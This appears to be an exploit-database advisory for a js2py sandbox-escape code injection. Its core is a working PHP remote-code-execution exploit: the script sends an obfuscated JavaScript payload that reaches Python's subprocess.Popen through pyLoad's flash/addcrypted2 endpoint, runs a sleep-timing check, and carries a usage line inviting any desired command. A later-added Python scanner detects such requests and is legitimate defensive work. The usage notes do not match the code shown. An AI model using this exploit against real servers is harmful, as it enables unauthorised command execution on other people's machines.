
=============================================================================================================================================
| # Title : js2py versions 0.74 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://pypi.org/project/Js2Py/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Vulnerability found in js2py versions 0.74 and below. js2py is a popular Python package that can evaluate JavaScript code inside a Python interpreter.

[+] Save the code as poc.php.

[+] Lines 98 and 99: set your target.

[+] Usage: cmd => c:\www\test\php poc.php

[+] Payload:

<?php

// Include necessary libraries for HTTP requests and encoding
require 'vendor/autoload.php'; // Example for using HTTP libraries like Guzzle or similar

class PyloadRCEExploit
{
    private $target;
    private $rport;
    private $targetUri;

    public function __construct($target, $rport = 9666, $targetUri = '/')
    {
        $this->target = $target;
        $this->rport = $rport;
        $this->targetUri = $targetUri;
    }

    public function check()
    {
        $sleepTime = rand(5, 10);
        $cmd = "sleep $sleepTime";

        $startTime = microtime(true);
        $this->executeCommand($cmd);
        $elapsedTime = microtime(true) - $startTime;

        echo "Elapsed time: $elapsedTime seconds\n";

        if ($elapsedTime > $sleepTime) {
            echo "Target is vulnerable! Command injection succeeded.\n";
            return true;
        }

        echo "Target is not vulnerable.\n";
        return false;
    }

    public function exploit($payload)
    {
        echo "Executing exploit on {$this->target}...\n";

        if (!$this->check()) {
            echo "Target is not vulnerable. Exploitation aborted.\n";
            return;
        }

        $this->executeCommand($payload);
        echo "Exploit executed. Check the target for results.\n";
    }

    private function javascriptPayload($cmd)
    {
        // Generate obfuscated JavaScript payload
        $escapedCmd = addslashes($cmd);
        return <<<EOD
let cmd = "$escapedCmd";
let base = '__base__';
let getAttribute = '__getattribute__';
let obj = Object.getOwnPropertyNames({})[getAttribute]("__class__")[base];
let subprocess = obj[getAttribute]('__subclasses__')().find(c => c.__module__ === 'subprocess' && c.__name__ === 'Popen');
subprocess(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
EOD;
    }

    private function executeCommand($cmd)
    {
        $client = new GuzzleHttp\Client();
        $cryptedB64 = base64_encode(random_bytes(4));
        $javascriptPayload = $this->javascriptPayload($cmd);

        try {
            $response = $client->post("http://{$this->target}:{$this->rport}{$this->targetUri}flash/addcrypted2", [
                'headers' => [
                    'Host' => "127.0.0.1:{$this->rport}"
                ],
                'form_params' => [
                    'crypted' => $cryptedB64,
                    'jk' => $javascriptPayload
                ],
                'timeout' => 10
            ]);

            if ($response->getStatusCode() === 500) {
                echo "Command executed successfully.\n";
                return true;
            }

        } catch (Exception $e) {
            echo "Error: {$e->getMessage()}\n";
        }

        return false;
    }
}

// Example usage
$exploit = new PyloadRCEExploit('192.168.1.100');
$exploit->exploit('id'); // Replace 'id' with your desired payload
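A defender-side companion to the advisory, added here and not part of the original post or of the js2py or pyLoad projects: a small request scanner that flags POSTs to the `flash/addcrypted2` handler whose `jk` parameter carries Python "dunder" names (`__getattribute__`, `__subclasses__`, `__base__`, `__class__`) or process-spawning identifiers, which a legitimate ClickNLoad key function never contains. The request record shape (method, path, urlencoded body) and the sample requests are constructed for this example; the markers themselves come from the payload above.

```python
import re
from urllib.parse import urlsplit, parse_qs, urlencode

# Endpoint the advisory's PHP client posts to (pyLoad's ClickNLoad handler).
SUSPECT_PATH = "/flash/addcrypted2"

# Attribute names the advisory's JavaScript payload uses to walk from a JS
# object into the Python interpreter. A real 'jk' function only computes a
# hex key string and has no reason to touch Python internals.
DUNDER_MARKERS = ("__getattribute__", "__subclasses__", "__base__", "__class__", "__module__")
# Catch-all for any other dunder name.
DUNDER_RE = re.compile(r"__[A-Za-z_]+__")
# Identifiers tied to spawning a process from inside the escaped sandbox.
PROCESS_MARKERS = ("subprocess", "Popen")


def form_from_body(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def score_request(method, path, body):
    """Return the reasons a request looks like a js2py sandbox-escape attempt
    against addcrypted2; an empty list means nothing was flagged."""
    reasons = []
    if method.upper() != "POST":
        return reasons
    # targetUri in the advisory may prefix the path, so match on the suffix.
    if not urlsplit(path).path.endswith(SUSPECT_PATH):
        return reasons

    jk = form_from_body(body).get("jk", "")

    hits = [m for m in DUNDER_MARKERS if m in jk]
    if hits:
        reasons.append("python dunder names in jk: " + ", ".join(hits))
    else:
        other = DUNDER_RE.search(jk)
        if other:
            reasons.append("unexpected dunder name in jk: " + other.group(0))

    if any(m in jk for m in PROCESS_MARKERS):
        reasons.append("process-spawning identifiers in jk")
    return reasons


def scan(records):
    """records: iterable of (method, path, body). Returns [(path, reasons), ...]
    for every record that scored at least one reason."""
    flagged = []
    for method, path, body in records:
        reasons = score_request(method, path, body)
        if reasons:
            flagged.append((path, reasons))
    return flagged


# Constructed sample traffic (not captured data): a benign ClickNLoad call,
# one shaped like the advisory's payload, and a GET that the handler ignores.
SAMPLE_REQUESTS = [
    ("POST", "/flash/addcrypted2",
     urlencode({"crypted": "AAAA", "jk": "function f(){ return '0123456789abcdef'; }"})),
    ("POST", "/flash/addcrypted2",
     urlencode({"crypted": "AAAA",
                "jk": "let o = Object.getOwnPropertyNames({})['__getattribute__']('__class__')['__base__'];"})),
    ("GET", "/flash/addcrypted2", ""),
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_REQUESTS):
        print(path, "->", "; ".join(reasons))
```

The check is deliberately a string heuristic rather than a JavaScript parser, so it runs cheaply over proxy or WAF request logs; pair it with an alert on HTTP 500 responses from the same endpoint, since the advisory's client treats a 500 as the success signal.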


===================================================================================================
Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
===================================================================================================